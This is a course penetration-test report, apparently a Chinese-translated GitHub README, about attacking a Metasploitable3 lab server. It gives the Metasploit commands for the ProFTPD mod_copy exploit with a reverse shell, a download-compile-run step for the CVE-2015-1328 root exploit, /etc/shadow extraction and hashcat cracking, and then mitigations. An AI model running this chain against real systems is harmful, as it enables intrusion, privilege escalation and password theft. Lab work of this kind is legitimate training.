rafidCyber/metasploitable3-pentest

GitHub: rafidCyber/metasploitable3-pentest

一个完整的服务器渗透测试实战项目,演示从信息收集到权限提升和凭据破解的全流程攻击链。

Stars: 0 | Forks: 0

# 服务器漏洞评估与利用 ### 系统与虚拟化安全 | 埃德蒙顿康考迪亚大学 ![Kali Linux](https://img.shields.io/badge/Kali_Linux-557C94?style=for-the-badge&logo=kali-linux&logoColor=white) ![Metasploit](https://img.shields.io/badge/Metasploit-2596CD?style=for-the-badge&logo=metasploit&logoColor=white) ![License](https://img.shields.io/badge/License-Educational_Use_Only-red?style=for-the-badge) ## 📋 概述 本项目演示了针对运行在 VMware 虚拟化环境中的 **Metasploitable3** 目标服务器的完整渗透测试生命周期。使用行业标准的工具 —— **Nmap**、**Nessus** 和 **Metasploit**,该评估涵盖了侦察、漏洞发现、漏洞利用、权限提升以及后渗透凭据提取。 本项目遵循 **Cyber Kill Chain** 框架作为其方法论。 ## 🛠️ 使用的工具 | 工具 | 用途 | |------|---------| | **Kali Linux** | 攻击机操作系统 | | **Nmap** | 网络扫描与服务版本检测 | | **Nessus** | 自动化漏洞扫描 | | **Metasploit Framework** | 漏洞利用与 Payload 投递 | | **Hashcat** | 密码 Hash 破解 | | **Exploit DB** | 权限提升漏洞来源 (EDB-ID: 37292) | ## 🖥️ 实验环境 | 机器 | 操作系统 | IP 地址 | 角色 | |---------|----|------------|------| | 攻击者 | Kali Linux 2024.4 | `192.168.233.129` | 客户端机器 | | 目标 | Metasploitable3 (Ubuntu 14.04) | `192.168.233.131` | 受害者服务器 | 两台虚拟机均连接在同一个 VMware 仅主机 (host-only) 网络上,未暴露于互联网。 ## 🔍 方法论 — Cyber Kill Chain ``` Reconnaissance → Weaponization → Delivery → Exploitation → Installation → C2 → Action on Objectives ``` 1. **侦察 (Reconnaissance)** — 使用 Nmap `-sV` 扫描识别开放端口和服务版本 2. **武器化 (Weaponization)** — 在 Metasploit 中识别 ProFTPD 1.3.5 Mod_Copy 漏洞利用 (`exploit/unix/ftp/proftpd_modcopy_exec`) 3. **投递 (Delivery)** — 配置 RHOSTS、SITEPATH (`/var/www/html`) 和反向 Python Payload 4. **漏洞利用 (Exploitation)** — 通过端口 4444 的反向 TCP 建立命令 Shell 会话 5. **安装 (Installation)** — 从 Exploit-DB 下载 CVE-2015-1328 漏洞利用代码到 `/tmp` 6. **权限提升 (Privilege Escalation)** — 编译并执行 overlayfs 内核漏洞利用 → 获取 root 权限 7. **行动目标 (Action on Objectives)** — 访问 `/etc/shadow`,提取密码 Hash,使用 Hashcat 破解 ## 🔎 发现的关键漏洞 (Nessus 扫描 — 共 72 个) | 严重程度 | CVE / 插件 | 漏洞 | CVSS | |----------|-------------|---------------|------| | 🔴 严重 | Plugin 84215 | ProFTPD mod_copy 信息泄露 | 9.8 | | 🔴 严重 | Plugin 92626 | Drupal Coder 模块反序列化 RCE | 10.0 | | 🟠 高危 | Plugin 42873 | SSL 中等强度密码套件 (SWEET32) | 7.5 | | 🟠 高危 | Plugin 78515 | Drupal 数据库抽象 API SQLi | 7.5 | | 🟡 中危 | Plugin 50686 | IP 转发已启用 | 6.5 | | 🟡 中危 | Plugin 51192 | SSL 证书不可信 | 6.5 | | 🟡 中危 | CVE-2023-48795 | SSH Terrapin 前缀截断弱点 | 5.9 | ## 💥 漏洞利用链 ### 步骤 1 — 侦察:Nmap 服务扫描 ``` nmap -sV 192.168.233.131 ``` ![Nmap Scan Results](https://github.com/rafidCyber/metasploitable3-pentest/blob/0a4f0519739eae673837d92d753d0434479fee2f/nmap_scan.png) 扫描显示端口 21 上运行着 ProFTPD 1.3.5 —— 与 Nessus 识别的严重漏洞直接匹配。其他值得注意的开放服务:OpenSSH 6.6.1p1 (端口 22)、Apache 2.4.7 (端口 80)、MySQL (端口 3306) 和 Jetty 8.1.7 (端口 8080)。 ### 步骤 2 — 漏洞利用:通过 Metasploit 利用 ProFTPD mod_copy ``` msf6 > search proftpd 1.3.5 msf6 > use 0 msf6 > set RHOSTS 192.168.233.131 msf6 > set SITEPATH /var/www/html msf6 > set payload payload/cmd/unix/reverse_python msf6 > set LHOST 192.168.233.129 msf6 > exploit ``` ![Metasploit Module Search](https://github.com/rafidCyber/metasploitable3-pentest/blob/0a4f0519739eae673837d92d753d0434479fee2f/metasploit_search.png) `exploit/unix/ftp/proftpd_modcopy_exec` 模块被评为 **Excellent (优秀)** —— 表明其具有高可靠性。使用 `use 0` 加载后,默认 Payload 设置为 `cmd/unix/reverse_netcat`。 ### 步骤 3 — 建立 Shell:开启反向 TCP 会话 ![Exploit Execution Success](https://github.com/rafidCyber/metasploitable3-pentest/blob/0a4f0519739eae673837d92d753d0434479fee2f/exploit_success.png) 该漏洞利用程序连接到 FTP 服务器,通过 Mod_Copy 漏洞上传并执行了 PHP Payload (`musXr.php`),随后自动清理了痕迹。反向 Shell 会话成功开启: ``` Command shell session 1 opened (192.168.233.129:4444 → 192.168.233.131:46704) ``` 初始 Shell 访问权限为 `www-data` (低权限 Web 服务器用户)。 ### 步骤 4 — 权限提升:CVE-2015-1328 (overlayfs) ![Exploit Execution Success](https://github.com/rafidCyber/metasploitable3-pentest/blob/ab7572bb1d941998649a6d9617a4904874235d91/privesc_compile.png) ``` cd /tmp wget https://www.exploit-db.com/raw/37292 mv 37292 exploit.c gcc exploit.c -o exploit ./exploit whoami # → root ``` 利用了影响 Ubuntu 14.04 (内核 3.13.0–3.19) 的 overlayfs 本地权限提升漏洞。通过 `whoami` 确认已获取完整的 root 访问权限。 ### 步骤 5 — 后渗透:Hash 提取与破解 ``` cat /etc/shadow # Extracted SHA-512crypt ($6$) hashes sudo hashcat -m 1800 /path/to/shadow /path/to/wordlist sudo hashcat -m 1800 /path/to/shadow /path/to/wordlist --show ``` 使用 **RockYou.txt** 字典针对 SHA-512crypt Hash 成功破解了多个用户密码。 ## 🛡️ 建议 | 领域 | 缓解措施 | |------|-----------| | **FTP** | 禁用 ProFTPD;迁移至 SFTP/FTPS;应用补丁 | | **认证** | 强制执行 MFA、强密码策略、账户锁定机制 | | **加密** | 用 TLS 1.2/1.3 替换弱 SSL/TLS;使用 CA 签名的证书 | | **内核** | 及时应用内核补丁;限制 `/tmp` 的写入权限 | | **Web 应用** | 部署 WAF;实施输入验证;更新 Drupal 模块 | | **监控** | 启用 IDS/IPS;集中化日志记录;定期执行 Nessus 扫描 | ## 📚 参考资料 - [Exploit-DB EDB-ID: 37292 — overlayfs 本地权限提升](https://www.exploit-db.com/exploits/37292) - [NVD — CVE-2015-1328](https://nvd.nist.gov/vuln/detail/CVE-2015-1328) - [Metasploit 文档](https://docs.metasploit.com/) - [Nmap 参考指南](https://nmap.org/book/man.html) ## 👤 作者 **Mutasim Rafid** — 埃德蒙顿康考迪亚大学 MISSM 学生 *课程:系统与虚拟化安全 | 教授:Benoit Desforges*
标签:AES-256, Bitdefender, CISA项目, CTI, Cyber Kill Chain, DOS头擦除, Hashcat, Metasploitable3, Nessus, Nmap, PE 加载器, ProFTPD, Web报告查看器, 云存储安全, 协议分析, 密码破解, 密码管理, 提权漏洞, 插件系统, 教育项目, 数据统计, 权限提升, 渗透测试报告, 漏洞复现, 漏洞评估, 爆破, 端口扫描, 系统加固, 编程工具, 网络信息收集, 网络安全, 网络扫描, 虚拟机安全, 虚拟驱动器, 远程代码执行, 隐私保护, 靶场实训